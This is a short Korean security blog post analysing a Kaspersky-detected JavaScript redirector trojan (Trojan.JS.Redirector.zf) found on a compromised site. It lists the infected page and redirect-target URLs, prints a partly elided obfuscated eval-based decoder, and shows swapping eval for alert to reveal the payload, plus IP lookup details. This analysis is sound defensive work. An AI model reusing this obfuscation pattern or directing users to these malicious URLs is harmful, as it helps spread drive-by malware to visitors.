본문 바로가기
security/악성코드 유포

Trojan.JS.Redirector.zf [Kaspersky]

Kwan's 2013. 7. 2. 18:30

발견지 : http://gotosite.home.xs4all.nl/b&b/left.htmx (Trojan.JS.Redirector.zf - Kaspersky)

             -> http://deviced.com/vanilla/8BztG4W3.phx


바이러스 토탈 : https://www.virustotal.com/en/file/160b039d3ffc826fd73313780d61fb6f7e23d92da96dc40608e34cda2ab2c6d8/

analysis/1372757516/


우연히 돌아다니다가 발견해서 끄적끄적 해본다.....

최종 접속 시 왜 ok 라는 시그널만 내보낼까 궁금하다................

쿠키값때문인가??

아시는 분 계시면 알려주세요~ : )




e=eval;v="0"+"x";a=0;z="y";try{a*=2}catch(q){a=1}if(!a){try{document["\x62od"+z]++}catch(q){a2="_"}z=[생략]"

["split"](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-4-3);}zaz=za;e(zaz);}


za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-4-3);}zaz=za;e(zaz); 

// 계산식

za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-4-3);}zaz=za;alert(zaz); 

// 출력


Deviced.com | Deviced IP Lookup (IP: 84.38.68.117)

Hostname:deviced.com
IP Address:84.38.68.117
Host of this IP:vserver2407.vserver-on.de
Organization:ispOne business GmbH
ISP:ispOne business GmbH
City:-
Country:Germany 
State:-
Timezone:-
Local Time:

-





저작자표시 비영리 변경금지

'security > 악성코드 유포' 카테고리의 다른 글

[Web Developer Forum - 2012.06.13] Malicious Code Inject: What Does It Do?  (1) 2014.01.08
[악성 스크립트로 연결하는 스팸메일] I want you to be healthy  (2) 2013.10.22
Red Exploit Kit (CVE-2013-0422) 에서 변경된 Cool Exploit Kit(CVE-2013-2423) 도식화  (0) 2013.05.31
개인 정보(주민등록번호 등..) 수집하는 성인 사이트 !  (0) 2013.05.11
Exploit:JS/Blacole.KH (Microsoft)  (0) 2013.02.14

'security/악성코드 유포' Related Articles

티스토리툴바